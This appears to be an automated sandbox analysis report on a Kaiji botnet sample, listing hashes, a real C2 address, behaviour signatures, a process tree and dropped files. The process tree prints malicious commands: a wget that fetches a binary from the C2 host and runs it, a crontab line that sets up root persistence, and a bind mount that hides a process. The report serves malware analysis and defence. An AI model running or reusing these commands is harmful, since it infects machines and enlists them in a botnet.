Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20250410-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20250410-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    16/04/2025, 18:46

General

  • Target

    download.sh

  • Size

    2KB

  • MD5

    544a2f391e2800bac07e883d902bcc75

  • SHA1

    cea67c26c372d03b795bbba678569256385d3b83

  • SHA256

    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

  • SHA512

    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Extracted

Family

kaiji

C2

154.40.47.248:888

Signatures

  • Kaiji 1 IoCs

    Kaiji payload

  • Kaiji family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 3 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 34 IoCs

    Adds/modifies system service, likely for persistence.

  • Write file to user bin folder 4 IoCs
  • Modifies Bash startup script 2 TTPs 3 IoCs
  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/download.sh
    /tmp/download.sh
    1⤵
    • Executes dropped EXE
    PID:1524
    • /bin/uname
      uname -s
      2⤵
        PID:1525
      • /bin/uname
        uname -m
        2⤵
          PID:1526
        • /usr/bin/wget
          wget -t 1 http://154.40.47.248:8000/linux_amd64
          2⤵
          • Writes file to tmp directory
          PID:1527
        • /bin/chmod
          chmod +x linux_amd64
          2⤵
          • File and Directory Permissions Modification
          PID:1531
        • /tmp/linux_amd64
          ./linux_amd64
          2⤵
          • Executes dropped EXE
          • Enumerates kernel/hardware configuration
          PID:1532
          • /tmp/linux_amd64
            ./linux_amd64 " "
            3⤵
            • Modifies Watchdog functionality
            • Creates/modifies environment variables
            • Modifies init.d
            • Write file to user bin folder
            • Modifies Bash startup script
            • Changes its process name
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:1536
            • /bin/sh
              /bin/sh -c "/etc/32676&"
              4⤵
              • Executes dropped EXE
              • Command and Scripting Interpreter: Unix Shell
              PID:1541
            • /usr/sbin/service
              service crond start
              4⤵
                PID:1543
                • /usr/bin/basename
                  basename /usr/sbin/service
                  5⤵
                    PID:1545
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                      PID:1546
                    • /bin/systemctl
                      systemctl --quiet is-active multi-user.target
                      5⤵
                      • Reads runtime system information
                      PID:1547
                    • /bin/sed
                      sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                      5⤵
                      • Reads runtime system information
                      PID:1550
                    • /bin/systemctl
                      systemctl list-unit-files --full "--type=socket"
                      5⤵
                      • Reads runtime system information
                      PID:1549
                    • /bin/systemctl
                      systemctl -p Triggers show acpid.socket
                      5⤵
                      • Reads runtime system information
                      PID:1551
                    • /bin/systemctl
                      systemctl -p Triggers show apport-forward.socket
                      5⤵
                      • Reads runtime system information
                      PID:1552
                    • /bin/systemctl
                      systemctl -p Triggers show avahi-daemon.socket
                      5⤵
                        PID:1553
                      • /bin/systemctl
                        systemctl -p Triggers show cups.socket
                        5⤵
                        • Reads runtime system information
                        PID:1554
                      • /bin/systemctl
                        systemctl -p Triggers show dbus.socket
                        5⤵
                          PID:1555
                        • /bin/systemctl
                          systemctl -p Triggers show saned.socket
                          5⤵
                          • Reads runtime system information
                          PID:1556
                        • /bin/systemctl
                          systemctl -p Triggers show snapd.socket
                          5⤵
                          • Reads runtime system information
                          PID:1557
                        • /bin/systemctl
                          systemctl -p Triggers show ssh.socket
                          5⤵
                          • Reads runtime system information
                          PID:1558
                        • /bin/systemctl
                          systemctl -p Triggers show syslog.socket
                          5⤵
                          • Reads runtime system information
                          PID:1559
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-fsckd.socket
                          5⤵
                          • Reads runtime system information
                          PID:1560
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-initctl.socket
                          5⤵
                          • Reads runtime system information
                          PID:1561
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald-audit.socket
                          5⤵
                          • Reads runtime system information
                          PID:1562
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald-dev-log.socket
                          5⤵
                          • Reads runtime system information
                          PID:1563
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald.socket
                          5⤵
                            PID:1564
                          • /bin/systemctl
                            systemctl -p Triggers show systemd-networkd.socket
                            5⤵
                            • Reads runtime system information
                            PID:1565
                          • /bin/systemctl
                            systemctl -p Triggers show systemd-rfkill.socket
                            5⤵
                              PID:1566
                            • /bin/systemctl
                              systemctl -p Triggers show systemd-udevd-control.socket
                              5⤵
                                PID:1567
                              • /bin/systemctl
                                systemctl -p Triggers show systemd-udevd-kernel.socket
                                5⤵
                                  PID:1568
                                • /bin/systemctl
                                  systemctl -p Triggers show uuidd.socket
                                  5⤵
                                  • Reads runtime system information
                                  PID:1569
                              • /usr/local/sbin/systemctl
                                systemctl start crond.service
                                4⤵
                                  PID:1543
                                • /usr/local/bin/systemctl
                                  systemctl start crond.service
                                  4⤵
                                    PID:1543
                                  • /usr/sbin/systemctl
                                    systemctl start crond.service
                                    4⤵
                                      PID:1543
                                    • /usr/bin/systemctl
                                      systemctl start crond.service
                                      4⤵
                                        PID:1543
                                      • /sbin/systemctl
                                        systemctl start crond.service
                                        4⤵
                                          PID:1543
                                        • /bin/systemctl
                                          systemctl start crond.service
                                          4⤵
                                            PID:1543
                                          • /bin/sh
                                            /bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                                            4⤵
                                            • Creates/modifies Cron job
                                            • Command and Scripting Interpreter: Unix Shell
                                            PID:1570
                                          • /usr/bin/renice
                                            renice -20 1536
                                            4⤵
                                              PID:1571
                                            • /bin/mount
                                              mount -o bind /tmp/ /proc/1536
                                              4⤵
                                                PID:1572
                                              • /usr/sbin/service
                                                service cron start
                                                4⤵
                                                  PID:1574
                                                  • /usr/bin/basename
                                                    basename /usr/sbin/service
                                                    5⤵
                                                      PID:1575
                                                    • /usr/bin/basename
                                                      basename /usr/sbin/service
                                                      5⤵
                                                        PID:1576
                                                      • /bin/systemctl
                                                        systemctl --quiet is-active multi-user.target
                                                        5⤵
                                                          PID:1577
                                                        • /bin/sed
                                                          sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                                          5⤵
                                                            PID:1580
                                                          • /bin/systemctl
                                                            systemctl list-unit-files --full "--type=socket"
                                                            5⤵
                                                            • Reads runtime system information
                                                            PID:1579
                                                          • /bin/systemctl
                                                            systemctl -p Triggers show acpid.socket
                                                            5⤵
                                                            • Reads runtime system information
                                                            PID:1581
                                                          • /bin/systemctl
                                                            systemctl -p Triggers show apport-forward.socket
                                                            5⤵
                                                              PID:1582
                                                            • /bin/systemctl
                                                              systemctl -p Triggers show avahi-daemon.socket
                                                              5⤵
                                                              • Reads runtime system information
                                                              PID:1583
                                                            • /bin/systemctl
                                                              systemctl -p Triggers show cups.socket
                                                              5⤵
                                                                PID:1584
                                                              • /bin/systemctl
                                                                systemctl -p Triggers show dbus.socket
                                                                5⤵
                                                                • Reads runtime system information
                                                                PID:1585
                                                              • /bin/systemctl
                                                                systemctl -p Triggers show saned.socket
                                                                5⤵
                                                                • Reads runtime system information
                                                                PID:1586
                                                              • /bin/systemctl
                                                                systemctl -p Triggers show snapd.socket
                                                                5⤵
                                                                  PID:1587
                                                                • /bin/systemctl
                                                                  systemctl -p Triggers show ssh.socket
                                                                  5⤵
                                                                  • Reads runtime system information
                                                                  PID:1588
                                                                • /bin/systemctl
                                                                  systemctl -p Triggers show syslog.socket
                                                                  5⤵
                                                                  • Reads runtime system information
                                                                  PID:1589
                                                                • /bin/systemctl
                                                                  systemctl -p Triggers show systemd-fsckd.socket
                                                                  5⤵
                                                                    PID:1590
                                                                  • /bin/systemctl
                                                                    systemctl -p Triggers show systemd-initctl.socket
                                                                    5⤵
                                                                    • Reads runtime system information
                                                                    PID:1591
                                                                  • /bin/systemctl
                                                                    systemctl -p Triggers show systemd-journald-audit.socket
                                                                    5⤵
                                                                      PID:1592
                                                                    • /bin/systemctl
                                                                      systemctl -p Triggers show systemd-journald-dev-log.socket
                                                                      5⤵
                                                                      • Reads runtime system information
                                                                      PID:1593
                                                                    • /bin/systemctl
                                                                      systemctl -p Triggers show systemd-journald.socket
                                                                      5⤵
                                                                      • Reads runtime system information
                                                                      PID:1594
                                                                    • /bin/systemctl
                                                                      systemctl -p Triggers show systemd-networkd.socket
                                                                      5⤵
                                                                      • Reads runtime system information
                                                                      PID:1595
                                                                    • /bin/systemctl
                                                                      systemctl -p Triggers show systemd-rfkill.socket
                                                                      5⤵
                                                                      • Reads runtime system information
                                                                      PID:1596
                                                                    • /bin/systemctl
                                                                      systemctl -p Triggers show systemd-udevd-control.socket
                                                                      5⤵
                                                                        PID:1597
                                                                      • /bin/systemctl
                                                                        systemctl -p Triggers show systemd-udevd-kernel.socket
                                                                        5⤵
                                                                        • Reads runtime system information
                                                                        PID:1598
                                                                      • /bin/systemctl
                                                                        systemctl -p Triggers show uuidd.socket
                                                                        5⤵
                                                                        • Reads runtime system information
                                                                        PID:1599
                                                                    • /usr/local/sbin/systemctl
                                                                      systemctl start cron.service
                                                                      4⤵
                                                                        PID:1574
                                                                      • /usr/local/bin/systemctl
                                                                        systemctl start cron.service
                                                                        4⤵
                                                                          PID:1574
                                                                        • /usr/sbin/systemctl
                                                                          systemctl start cron.service
                                                                          4⤵
                                                                            PID:1574
                                                                          • /usr/bin/systemctl
                                                                            systemctl start cron.service
                                                                            4⤵
                                                                              PID:1574
                                                                            • /sbin/systemctl
                                                                              systemctl start cron.service
                                                                              4⤵
                                                                                PID:1574
                                                                              • /bin/systemctl
                                                                                systemctl start cron.service
                                                                                4⤵
                                                                                • Reads runtime system information
                                                                                PID:1574
                                                                              • /bin/systemctl
                                                                                systemctl start crond.service
                                                                                4⤵
                                                                                • Reads runtime system information
                                                                                PID:1600
                                                                          • /bin/rm
                                                                            /bin/rm /tmp/download.sh
                                                                            2⤵
                                                                              PID:1537
                                                                          • /etc/32676
                                                                            /etc/32676
                                                                            1⤵
                                                                              PID:1542
                                                                              • /bin/sleep
                                                                                sleep 60
                                                                                2⤵
                                                                                  PID:1544
                                                                                • /bin/sleep
                                                                                  sleep 60
                                                                                  2⤵
                                                                                    PID:1616
                                                                                  • /bin/sleep
                                                                                    sleep 60
                                                                                    2⤵
                                                                                      PID:1627

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v16

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • /.mod

                                                                                    Filesize

                                                                                    34B

                                                                                    MD5

                                                                                    f5a3713282e43c200f30342f5ff5e2ea

                                                                                    SHA1

                                                                                    2b2ce1a207e2b691a074c6f78f71c4785aae426a

                                                                                    SHA256

                                                                                    6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511

                                                                                    SHA512

                                                                                    5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

                                                                                  • /etc/.walk

                                                                                    Filesize

                                                                                    49B

                                                                                    MD5

                                                                                    7b6092eb341d814a12c0772fcbd2e4c5

                                                                                    SHA1

                                                                                    af07165fcaecae523111049ad61a67eff08183ec

                                                                                    SHA256

                                                                                    07520ca9930e4658a481259f546f4ec55912d7968b019441fc18309d23c29f97

                                                                                    SHA512

                                                                                    0365451fae150c11bda418fea8c993e8ca6528b0818a78e1c4b91757e5fb458499cc2d4ac7dacb4725082686d2d6c88cb46f2676f4961e757fa57d36464d91a6

                                                                                  • /etc/.walk

                                                                                    Filesize

                                                                                    98B

                                                                                    MD5

                                                                                    9835effe62d8a1b41f6a6cd8057fd113

                                                                                    SHA1

                                                                                    71145150b1d03bfb36f277f7604c539442c30c05

                                                                                    SHA256

                                                                                    a3834cd0bd816bc3b28e9d2cc3dca12af6d717c3a94ee35d4ef5e0e4d6e635a0

                                                                                    SHA512

                                                                                    6b6e99977dff5c41e96e2c54e2326a562ff762fae54a472205aad3bf069bb6b3c0a1948840e65e9260c44794e1f19f47eceb6c44cc9a09f61f19dbe73930b47f

                                                                                  • /etc/32676

                                                                                    Filesize

                                                                                    56B

                                                                                    MD5

                                                                                    585f408444cbca746945f0cb63f2c3f0

                                                                                    SHA1

                                                                                    0e44bae17174f04514e770ca7fc4bec1007e39cd

                                                                                    SHA256

                                                                                    ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299

                                                                                    SHA512

                                                                                    022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

                                                                                  • /etc/profile.d/gateway.sh

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    fd68e894a07448b5229049cfad5ca5c8

                                                                                    SHA1

                                                                                    85f443429161fa1c111d69b308fd6d744cdef85c

                                                                                    SHA256

                                                                                    7d5fd87e6a3a6a9fe3783eeef0dd9fae0d412abbd625daed9dc06f6d7438e384

                                                                                    SHA512

                                                                                    d5f6213e3c361563f3ad318e3454c80e47ef19bcdbd8fa1875a3e83179e2091c2bd913c623322bc19c5064dfd09c8c2919cf68fcbd898d62e7d872cc7b6b17e3

                                                                                  • /tmp/linux_amd64

                                                                                    Filesize

                                                                                    1.9MB

                                                                                    MD5

                                                                                    4a67fbaac9ab2555654663e56ad125a1

                                                                                    SHA1

                                                                                    d6dbe82c06c8bd5b83eea3daa26605b10c4e4457

                                                                                    SHA256

                                                                                    c09b6758cad544622f1a8a0e5edb64af4b952eb95ae94dcfe20fc1af2a9ab7e4

                                                                                    SHA512

                                                                                    7a88709312bfdf50b3900abeab5e916fcbb63e773b58e158b557f239d1e8b861c4294dd86cfec80e4baf199fcb606d484da991c7b42594ec8999f945a4afb154

                                                                                  • /usr/bin/include/find

                                                                                    Filesize

                                                                                    232KB

                                                                                    MD5

                                                                                    f11b2b59639b1edcb46026472786c747

                                                                                    SHA1

                                                                                    a6fe59e11456bc7f19e28b38aa9c1f9c1a13b70d

                                                                                    SHA256

                                                                                    189fbf2416c8205430d8eaa85e2947bc15504ca335ad4a77ec668ff3cbf9c84a

                                                                                    SHA512

                                                                                    1967f43b4b274e2afbc30e8e1bad314085e488066b22233e6ec033dbae10ae111320296b9d429e94cb3079636a37e433aeac928b4ef23a56dedae1741815416b

                                                                                  • /usr/bin/include/lsof

                                                                                    Filesize

                                                                                    159KB

                                                                                    MD5

                                                                                    e093dc78225e2a0a25e3b137c1c1e442

                                                                                    SHA1

                                                                                    c29497cfaae729eb576875e4fdfa400640ab16be

                                                                                    SHA256

                                                                                    1190f4dbc7be174de8fd4096c9bf7a28eebfac937d308b7cc533be4a1240d26e

                                                                                    SHA512

                                                                                    fe1cc7a65327732eaaee89f427c10239ba822430e34177842f4681068d78d404b1830d808a2a71b1efcc5f126c6d8c053512237421173aaa150e215a672da6f0